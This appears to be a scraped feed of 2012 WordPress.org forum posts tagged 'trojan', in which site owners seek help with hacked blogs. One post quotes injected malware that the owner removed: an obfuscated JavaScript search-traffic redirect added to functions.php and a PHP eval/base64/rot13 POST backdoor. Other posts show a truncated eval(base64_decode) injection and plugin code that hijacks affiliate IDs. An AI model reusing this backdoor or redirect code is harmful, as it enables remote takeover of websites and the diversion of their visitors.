Quantcast
Channel: Topic Tag: trojan | WordPress.org
Viewing all 141 articles
Browse latest View live

ClearConscious on "Malware Issue, please someone help."

February 14, 2012, 10:31 am
$
0
0

Hey Guys,

So I've pretty much been looking everywhere for any information that might be helpful in existing me getting rid of this Malware issue I seemingly have.

It seems out of all the major virus software applications don't pick it up other than Avast.

Succuri has it listed as this: http://sitecheck.sucuri.net/results/http://www.theparanoidgamer.com

I've been looking through all the code and can't find anything suspicious. I've overridden most of the key Wordpress files and haven't gotten rid of the issue. Switched themes to see if it was a theme related issue, and also looked over the code or anything.

I'm not sure if anything aside for starting over will fix the issue.

I've looked over all the Wordpress related stuff and contacted the host which is completely useless (Godaddy).

Search

GeeksHaveLanded on "My Site Has A Trojan Horse, can pay small amount for fix."

February 16, 2012, 8:36 am
$
0
0

Hi

My site has been running fine but about 2 days ago I received e-mails claiming my website was triggering avast! for a trojan horse. I checked, and it is. I have installed anti-virus plugins which tell me where the threat could be, but I have no idea what to do next.

I am desperate to get this fixed, but can only offer roughly $5 to somebody to fix it.

Would anybody be interested in helping?

alechevallier on "Can't get rid of a redirecting trojan"

February 22, 2012, 4:47 pm
$
0
0

Hi everyone,

we recently discovered that our WP blog was infected. It is a redirecting trojan that redirects our traffic from search engines to a site (www.googosearch.biz).

We first identified the redirecting code in the functions.php file, and deleted it. It looked like this:

?><?php
add_action('get_footer', 'add_sscounter');
	function add_sscounter(){
		echo '<!--scounter-->';
		if(function_exists('is_user_logged_in')){
			if(time()%2 == 0 && !is_user_logged_in()){
				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
			}
		}
	}
?>

But the thing is that it comes back every day ! It looks like another file on our server is generating it every day.

I found a suspicious file that was added by a russian guy via FTP (I checked the logs) on the root of the site (but note that the site is healthy, only the blog is redirecting) named default.php. It looked like this:

<?php if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"]){eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST["e"]))))));exit;} ?>"

I deleted it thinking this code was generating the redirecting code. But it didn't do anything. The evil code is still showing up every morning in the functions.php file !

Does someone have an idea of how this could be fixed ?

Thank you for your help,

Alex

Eric Tang on "Website Got Virus"

March 15, 2012, 6:59 am
$
0
0

Hi all,

There are several responses saying that our website http://www.android-hk.com got infected with virus and it installed isecruity.exe to their computers.

AVAST said Infection: "HTML:Iframe-inf"
Another anti virus said: HEUR:Trojan.Script.Iframer

We did try to run scanning and detected nothing. Also, our computers also installed anti virus softwares but never get any alerts.

We are really desperate now and no clue to solve.

So, I hope we can get some advises from experts here :)

Many thanks in advance.

Sebaztian on "How to get rid of Virus, Worm, Trojan that injects code into your php files"

March 17, 2012, 9:31 pm
$
0
0

I have a handful of sites on one hosting account. The comfort of being able to access all of these sites with one login was very appealing to me until something infected all of them at once.

One of my sites had a malware warning on Google search result pages which made me suspicious and I started to realize that somehow someone or something got into the hosting account. Other websites didn't have a malware warning, but every time I would click on the results on Google it would forward me to a bunch of weird .pl and PPC websites instead of my actual pages. When I checked my php files, I noticed that somehow an encrypted code was added to almost ALL of my php files of ALL Wordpress sites. The code started with eval and then base64_decode plus a lot of encrypted code ...

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQ...

First, I chose work on my most important website first, went into all files and deleted the weird code with find/replace, but when I was done the forwarding was still on and nothing had changed. I went through all files again, but couldn't figure things out and I started deleting and re-uploading the latest releases of my plugins and other Wordpress files.

Second, I did more research and found this post http://goo.gl/OTa6s, http://goo.gl/IsZhf as well as http://goo.gl/cjYI4 and used the clean up and the scanner php files which helped me to find infected files that I hadn't noticed before.

I replaced all of these files with new ones and the websites seem to be free of the trojan now, but I'm not 100% sure if that really is the case just because everything is working again and I also don't know how to make sure the database didn't get infected at all.

I posted to help others that might encounter similar problems and don't want to waste a whole week like I did. Since my Wordpress and php knowledge is limited though, it would be awesome if someone could give me some advice on 1. how to make sure my database is not infected as well as 2. how I can be sure that I deleted the file that injected the code into my php files AND 3. to lock up my Wordpress installation for any future intruders without effecting its performance.

Thanks so much in advance!

sidea on "Z%&king Trojans"

April 18, 2012, 1:14 am
$
0
0

I have built 30 wordpress installations to date and only one has repeatedly come unter attack by a variety of Trojan Malware bugs.

I have a back-up sitting on my desktop at all times but the client (owner of a posh villa in the seychelles) is getting righteously ansty.

The last time it happened I took a raft of steps to ensure it wouldn't happen again - I won't go into them all, but they included changing user names, pass words and lots more but it happened again yesterday.

Is it possible that in an initial attack some code was left in there - either in the DB or elsewhere that is opening a back door to the site?

The site is completely static and as such I could change the permissions of the ftp folder to non writable, would this work or would it screw-up my wordpress site? I do recognise that to install new plugins and to update the Wordpress I would need to change them all back again but this seems like my only solution.

I am thinking of buying into the Sucuri malware deletion package for my 10 prime sites, has anyone had success with this as a solution?

steveb123 on "Trojan attacks"

April 19, 2012, 10:32 am
$
0
0

Not sure if this is the right forum but I thought I should post this somewhere on the forums. During the course of a regular back up to my local PC, Norton blocked 2 files as it felt that these files contained Trojan viruses. Both files sitemaps.php and template_rss.php were found in the public_html folder outside the wordpress folder but looking as if they were regular WP files. Maybe as a precaution it would be worth all having a look at their set-ups. Both files were dated 22/03/2012

TheSajin on "Hidden iFrames"

April 20, 2012, 6:48 pm
$
0
0

I got a message stating that my blog is trying install Trojan viruses and when I scanned the files I was told that there are hidden iframes in various parts of my blog. How do I remove these and prevent it from happening again?

Furthermore the automatic update feature is not working and none of the once install plugins are visible.

Search

Kanonis on "Trojan in Wordpress"

April 24, 2012, 9:47 am
$
0
0

The Not32 find trojan in my site..

The antivirus plugin find this...
/themes/seo-basics/functions.php

There is no virus View line 189return maybe_unserialize(get_option("sdstheme_{$section}_ads"));

There is no virus View line 380$headerAds = maybe_unserialize(get_option("sdstheme_header_ads"));

There is no virus View line 381$sidebarAds = maybe_unserialize(get_option("sdstheme_sidebar_ads"));

someone knows solution to this problem;

sharpenediron on "Virus?"

May 22, 2012, 11:23 pm
$
0
0

I have a wordpess site on Godaddy. They contacted me saying I had malicious content on my site. They removed it about 2 months ago and now they are telling me that it's back. After they made their changes to my site, i can no longer log in from my admin tab on my wp site. My McAffee doesn't see any problems when I open my site. How do I find and remove this virus? Please held if you can. Thanks.

LexyH on "Help with Trojan"

June 3, 2012, 7:55 am
$
0
0

My blog - thevfk.com - has a trojan horse. I uninstalled WP from within GoDaddy and deleted database, and re-installed, then restored from a known clean backup but trojan still there. Also changed all passwords. GoDaddy said they had to fix a vulnerability on their side. Confused and don't know what to do

earle on "Virus problem"

June 5, 2012, 8:05 am
$
0
0

Hi there,
I have a virus on my wordpress that is doing my head in! I'd really appreciate some help from someone who knows more than me in such matters.
how can I check what files are infected so I can clean it? I've tried looking through them but to no avail.
please help!

my site is http://www.technopodcast.com/blog/
using WordPress 3.3.2.

other info:
there has only been about 4 reports of it from users and I've only encountered a virus warning myself once. i.e. it does not happen on each visit.
also google analytics shows that there are 0 visitors for the last five days (its never been like that before, the site has a few hundred visits or more a day)

Kaspersky anti-virus reports the problem as :

The requested URL cannot be provided
Threat detected:
object infected HEUR:Trojan.Script.Iframer

I've tried to see if there is any malicious code but I cannot find any. if anyone has an idea, please help.

many thanks,
George

steveb123 on "Weakness in some installations of WP"

June 17, 2012, 9:24 am
$
0
0

In the last 24 hours I have received emails from folk I know directing me to different wp sites. My friends did not send the emails (their emails were hacked!)but I recognized the impossibility of the addresses as a wp user. The sites were strep throat treatments and http://emergencysiracusa.dotcoma.org. Both emails directed me to a page in /wp-content/themes/.....

I suspect a trojan was lurking

For general info

Sonophoto on "[Plugin: WP-Amazon-Search widget] DECEPTIVE PLUGIN"

June 17, 2012, 8:32 pm
$
0
0

This plugin is a type of trojan. It appears to be broken, but the author intended for it to generate sales for his hard-coded affiliate IDs The javascript that this plugin references looks like it is official Amazon code. It is not, the code has some logic in it that routes your clicks to your affiliate ID only 20% of the time, and only then if you can code and configure it:

Here is what happens:

First, the plugin code contains a messy, verbose configuration followed by a callback that installs the [search] shortcode. The idea is that you set AS_DEFAULT_TAG to your AMZN affiliate ID. The author of the plugin was kind enough to use his as a default (so you could find it, right?)

Right now in the execution of the code (PHP) $tag contains OUR AFFILIATE ID (if we set it)

A random number is generated in the plugin code (PHP):

$tag=rand(1,5)==2?AS_DEFAULT_TAG:$tag;

Catch the trick? That X ? A : B construct is a shorthand for an if else statement. First, rand generates a random number in the set [1,5], Second, if that number is '2' then your AS_DEFAULT_TAG is used, assigns back through the left side and is assigned to $tag. This value then moves to amzn_wdgt.tag, a variable that is then emmitted in in the javascript that is output into the page, just ahead of the fake amazon Javascript. If it doesn't equate to '2' then this number continues into the code: YOUR AFFILIATE ID IS GONE NOW.

The Javascript then gets very messy amzn_wdgt.tag passed to it from the plugin code to switch a key value and select an amazon affiliate ID based on location, all of which are hard coded with different Affiliate IDs, and I bet none of them are yours...

http://wordpress.org/extend/plugins/amazon-search-widget/

Sonophoto on "[Plugin: WP-Amazon-Carousel] Warning, This plugin is a TROJAN"

June 17, 2012, 11:02 pm
$
0
0

This Plugin exhibits behavior like "jeffbert's" Amazon search plugin. In other words if you modify this plugin according to the instructions he gives here online and in the readme of the plugin HE IGNORES your affiliate ID and instead sets his ID by default. In this one he appears to have left in a debugging echo to see which tag he was setting.

I do not think this is an innocent or beginner mistake because the code from his Amazon-search plugin has layered filters in two languages for anyone setting their own amazon affiliate ID. This can be verified by running the code and reviewing the actual page that is output.

Here is the "fix" in the PHP code from the plugin:

`

Plugin URI: http://wordpress.org/#
Description: This plugin lets you create an Amazon Carousel widget in a brain-dead, simple way. It's as easy as typing [carousel] anywhere in your post and you get a beautiful Flash widget with Amazon products.
Author: Zahid Khan
Version: 1.6
Author URI: http://grabkindle.com/
*/
// Chance the constants below to customize this plugin
define("DEFAULT_WIDTH", "500");
define("DEFAULT_HEIGHT", "175");
define("DEFAULT_TAG", "wp-carousel-20"); <<<-- ! By Default
define("DEFAULT_CATEGORY", "Books");
define("DEFAULT_SHOW_BORDER", "False");
define("DEFAULT_SHUFFLE_PRODUCTS", "False");
define("DEFAULT_MARKETPLACE", "US");
// [carousel]
function carousel_func($atts) {
extract(shortcode_atts(array(
'tag' => 'wp-carousel-20', <<<<-- ! THIS SHOULD BE DEFAULT_TAG
'width' => DEFAULT_WIDTH,
'height' => DEFAULT_HEIGHT,
'category' => DEFAULT_CATEGORY,
'browse_node' => '',
'title' => '',

I'm not analyzing this code further. His javascript code in his Amazon search plugin ignored the value when it got through the plugin's PHP code 1 out 5 times. So that means 0 out of 0. This one has the same type of line but the call is rand(1,10).

http://wordpress.org/extend/plugins/wp-amazon-carousel/

Search

marsha123 on "Google Blacklisted My Blog..."

July 21, 2012, 12:14 am
$
0
0

My WordPress blog has been hacked with Malware, Trojans & Spambots. My security plugins Website Defender & Verelo did not prevent the attack. How can I get this site back online, how do I clean it & how do I verify it with Google!!!!!

thornway on "[Plugin: WP-Property - WordPress Powered Real Estate and Property Management] Shell backdoor Trojan "

August 29, 2012, 2:24 am
$
0
0

I have been made aware of a vulnerability in wp-content/plugins/wp-property/third-party/uploadify/auth.php which is prone to attack from a severe backdoor Trojan.
Subsequent Malware scans of backups have identified this virus.

One post suggested modification of .htaccess but then another post said that you should not use .htaccess as a security measure. Also not sure anyway if you can modify certain files with .htaccess (I am a total novice)

Has anyone come across the above and discovered a suitable solution

http://wordpress.org/extend/plugins/wp-property/

cyberhubdan on "[Plugin: WordPress File Monitor Plus] Trojan Loaded onto my website"

October 9, 2012, 9:19 pm

blossomel on "Parse error: syntax error"

October 16, 2012, 3:21 pm
$
0
0

I wanted to add twitter gadget to my wordpress, I pasted the code that twitter gives in one of the code pages of wp-admin panel, then, i got: Parse error: syntax error, unexpected '<' in /home/melisin/public_html/wp-content/themes/twentyeleven/inc/widgets.php on line 167

now even if I try to see my blog or want to log in from wp-admin page, I get this error. I looked up in the internet and saw that I got hacked. Then people said change your password but how can I, when I can't even login from wp-admin? Help please? Is it a trojan?

clarkneb on "Hacked Website?"

October 29, 2012, 12:56 pm
$
0
0

Help!! I'm somewhat new to WordPress and am stumped. Someone has apparently hacked my site to include links to advertisements, etc. and I cannot remove them. Please have a look at a page on my site and note the links for the words "application" and "register"--as examples. Can someone tell me how to get rid of this stuff? And how to protect my site from it happening again? Please see http://www.taxcompliant.net/site/integration/

Thanks very much. Clark

Viewing all 141 articles
Browse latest View live
Search